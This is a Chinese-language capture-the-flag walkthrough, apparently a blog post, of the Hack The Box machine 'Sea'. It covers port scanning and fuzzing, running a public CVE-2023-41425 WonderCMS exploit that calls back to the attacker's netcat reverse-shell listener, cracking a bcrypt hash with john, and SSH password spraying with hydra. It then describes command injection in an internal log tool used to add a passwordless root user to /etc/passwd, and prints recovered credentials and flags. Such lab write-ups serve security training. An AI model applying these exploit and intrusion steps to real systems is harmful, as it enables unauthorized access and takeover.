购物网站首页模板seo查询友情链接
目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
使用curl访问靶机80端口
使用ffuf对靶机进行了一顿FUZZ
尝试在Github上搜索版权拥有者
除了LICENSE还FUZZ出了version文件尝试访问
尝试直接在Github搜索该符合该版本的EXP
横向移动
使用john对该哈希值进行爆破
使用hydra对靶机系统进行SSH服务密码喷洒
USER_FLAG:fe382298cf2c1d24dff7ffe321071998
特权提升
直接使用amay用户的凭证即可登录
ROOT_FLAG:f0029f417785aefce36306dd8ee1951a
连接至HTB服务器并启动靶机
靶机IP:10.10.11.28
分配IP:10.10.16.7
使用nmap对靶机TCP端口进行开放扫描
nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.11.28 ┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.11.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-13 22:19 EST
Warning: 10.10.11.28 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.28
Host is up (0.15s latency).
Not shown: 64119 closed tcp ports (reset), 1414 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 50.14 seconds
使用curl访问靶机80端口
curl -I http://10.10.11.28:80┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.28:80
HTTP/1.0 200 OK
Date: Thu, 14 Nov 2024 03:10:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=taj3r4rcaf7irnq5gfk3hks2o5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
使用ffuf对靶机进行了一顿FUZZ
访问LICENSE文件
curl http://10.10.11.28/themes/bike/LICENSE┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.11.28/themes/bike/LICENSE
MIT LicenseCopyright (c) 2019 turboblack
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
尝试在Github上搜索版权拥有者
查看Github上的LICENSE文件可以发现与我们FUZZ到的文件内容是一模一样的
基本可以确定靶机使用的WebAPP为:WonderCMS
除了LICENSE还FUZZ出了version文件尝试访问
curl http://10.10.11.28/themes/bike/version┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.11.28/themes/bike/version
3.2.0
尝试直接在Github搜索该符合该版本的EXP
可以看到爆了漏洞编号:CVE-2023-41425
我这里使用的EXP链接:https://github.com/duck-sec/CVE-2023-41425(如果你找到的EXP不起作用可以试试这个)
git clone https://github.com/duck-sec/CVE-2023-41425.git配置好参数
python exploit.py -u http://sea.htb/loginURL -lh 10.10.16.7 -lp 1425 -sh 10.10.16.7 -sp 8888
将下面的链接通过/contact页面发送至管理员处,不多时便能收到访问请求
本地侧nc提前开启监听,此刻也可收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvp 1425
listening on [any] 1425 ...
10.10.11.28: inverse host lookup failed: Unknown host
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.28] 38378
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
11:03:14 up 30 min, 0 users, load average: 0.69, 0.67, 0.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
横向移动
通过命令可知系统内安装有python3
$ python3 -V
Python 3.8.10
提升TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'在一翻搜索后,在/var/www/sea/data目录下找到database.js文件
www-data@sea:/var/www/sea/data$ pwd
pwd
/var/www/sea/data
www-data@sea:/var/www/sea/data$ ls
ls
cache.json database.js files
使用cat命令查看其内容里面有一串哈希密码
grep -C 5 'password' database.js
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q将该哈希值去除反斜杠后存入hash文件中
echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q' | tr -d '\\' > hash┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q' | tr -d '\\' > hash
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat hash
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
使用john对该哈希值进行爆破
john hash --wordlist=../dictionary/rockyou.txt┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# john hash --wordlist=../dictionary/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:29 DONE (2024-11-14 06:32) 0.03343g/s 102.9p/s 102.9c/s 102.9C/s iamcool..milena
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
拿到了明文密码:mychemicalromance
由于不知道该密码对哪个用户有效,所以我们查看一下系统内支持登录的用户
cat /etc/passwd
支持终端交互的用户有:root、amay、geo
将三个用户名写入users.txt文件中
echo 'root\namay\ngeo' > users.txt┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo 'root\namay\ngeo' > users.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat users.txt
root
amay
geo
使用hydra对靶机系统进行SSH服务密码喷洒
hydra -L users.txt -p 'mychemicalromance' ssh://10.10.11.28
账户:amay
密码:mychemicalromance
使用该凭证通过SSH服务登录到靶机
ssh amay@10.10.11.28
登陆后在当前目录下就能找到user.txt
amay@sea:~$ ls
user.txt
amay@sea:~$ cat user.txt
fe382298cf2c1d24dff7ffe321071998
USER_FLAG:fe382298cf2c1d24dff7ffe321071998
特权提升
查看靶机网络连接
ss -tlnp
可见靶机内部是开放了8080端口,我尝试通过SSH服务将其转发到本地
ssh -L 8080:localhost:8080 amay@10.10.11.28端口转发后使用浏览器直接访问,上来就提示需要认证
直接使用amay用户的凭证即可登录
经过一系列测试发现,Analyze Log File此处存在任意文件读取
使用BurpSuite进行抓包重放
接着尝试RCE发现居然也可以
我尝试直接往靶机/etc/passwd文件中加入无密码管理员用户
记得将Payloadd进行URL编码
直接扔到重放器里发包
在靶机中再次查看/etc/passwd文件
cat /etc/passwd
查找root_flag位置并查看其内容
root@sea:/home/amay# find / -name 'root.txt'
/root/root.txt
root@sea:/home/amay# cat /root/root.txt
f0029f417785aefce36306dd8ee1951a